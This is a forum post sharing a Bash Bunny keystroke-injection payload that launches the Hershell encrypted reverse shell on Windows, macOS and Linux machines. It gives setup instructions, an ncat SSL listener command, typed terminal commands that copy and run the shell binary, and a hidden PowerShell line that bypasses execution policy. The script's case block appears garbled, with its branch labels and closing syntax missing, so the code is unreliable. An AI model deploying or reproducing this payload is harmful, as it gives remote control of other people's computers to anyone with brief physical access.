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Posts posted by mkmk

  1. Please PM me if there any issues/improvements. Thanks!

    # Title:         Hershell Encrypted Reverse Shell (Cross-platform - Manual Mode)
    # Author:        metalkey
    # Version:       0.5
    # Target:        Windows, Mac OSX, Linux
    # Creds:         Ronan Kervella (Creator of Hershell) - https://github.com/sysdream/hershell
    # Instructions:
    # Hershell Github: https://github.com/sysdream/hershell (read all instructions on Hershell git before starting)
    # 1. Compile all payloads and place binaries in the payloads\$SWITCH_POSITION directory (Double check binary names. Defaults are mac32, linux32, win32.exe)
    # 2. Uncomment desired target OS payload lines and ensure others are commented out
    # 3. Start ncat listener on your attacking machine, that is to receive the reverse shell (e.g. ncat --ssl --ssl-cert server.pem --ssl-key server.key -lvp 4343)
    # 4. Execute attack via Bash Bunny
    # SETUP
    DRIVER_LABEL='WINDOWS' # Drive label for your Bash Bunny
    LED R
    GET SWITCH_POSITION # Gets switch position (e.g. switch2)
    ATTACKMODE STORAGE HID SERIAL # Keyboard HID Attack + Storage + Serial
    # Modified RUN helper
    function RUN() {
       local os=$1
       [[ -z "$os" || -z "$*" ]] && exit 1
       case "$os" in
             QUACK GUI m
             QUACK DELAY 500
             QUACK GUI r
             QUACK DELAY 500
             QUACK STRING cmd.exe
             QUACK DELAY 100
             QUACK ENTER
             QUACK DELAY 500
             QUACK STRING "$@"
             QUACK DELAY 100
             QUACK ENTER
             QUACK GUI SPACE
             QUACK DELAY 100
             QUACK STRING terminal
             QUACK DELAY 100
             QUACK ENTER
             QUACK GUI t
             QUACK DELAY 100
             QUACK STRING /bin/bash
             QUACK DELAY 100
             QUACK ENTER
             QUACK STRING "$@"
             QUACK DELAY 100
             QUACK ENTER
             QUACK DELAY 100
             QUACK STRING "exit"
             QUACK DELAY 100
             QUACK ENTER
             QUACK DELAY 100
             QUACK STRING "exit"
             QUACK DELAY 100
             QUACK ENTER
             QUACK ALT F2
             QUACK DELAY 1000
             QUACK STRING xterm
             QUACK DELAY 1000
             QUACK ENTER
             QUACK DELAY 1000
             QUACK STRING /bin/bash
             QUACK DELAY 1000
             QUACK ENTER
             QUACK DELAY 500
             QUACK STRING cd /media/'$USER'
             QUACK DELAY 500
             QUACK ENTER
             QUACK DELAY 500
             QUACK STRING "$@"
             QUACK DELAY 500
             QUACK ENTER
             QUACK DELAY 500
             QUACK STRING "exit"
             QUACK DELAY 500
             QUACK ENTER
             QUACK DELAY 500
             QUACK STRING "exit"
             QUACK DELAY 500
             QUACK ENTER
             exit 1
    export -f RUN
    # START Attack
    LED Y
    # [+] Mac - Uncomment the following lines to use:
    # until ls -halt /dev | head -n 5 | grep -q "nandf"; do sleep 1; done # Wait for bb to mount
    # LED Y FAST
    # RUN OSX "cp /Volumes/$DRIVER_LABEL/payloads/$SWITCH_POSITION/mac32 /tmp && chmod +x /tmp/mac32 && /tmp/mac32 &"
    # [+] Linux - Uncomment the following lines to use:
    until dmesg | grep -q "sunxi_usb"; do sleep 1; done; sleep 5 # Wait for bb to mount
    RUN UNITY "cd $DRIVER_LABEL/payloads/$SWITCH_POSITION && cp linux32 /tmp/ && chmod +x /tmp/linux32 && /tmp/linux32 &"
    # [+] Windows - Uncomment the following lines to use:
    # until dmesg | grep -q "sunxi_usb"; do sleep 1; done; sleep 5 # Wait for bb to mount
    # LED Y FAST
    # RUN WIN powershell -NoP -NonI -W Hidden -exec bypass ".((gwmi win32_volume -f 'label=''$DRIVER_LABEL''').Name+'\payloads\\$SWITCH_POSITION\win32.exe')"
    # END
    sleep 5
    LED G
    # shutdown 0 # LIGHTS OUT = Shutdown and dismount (if desired)


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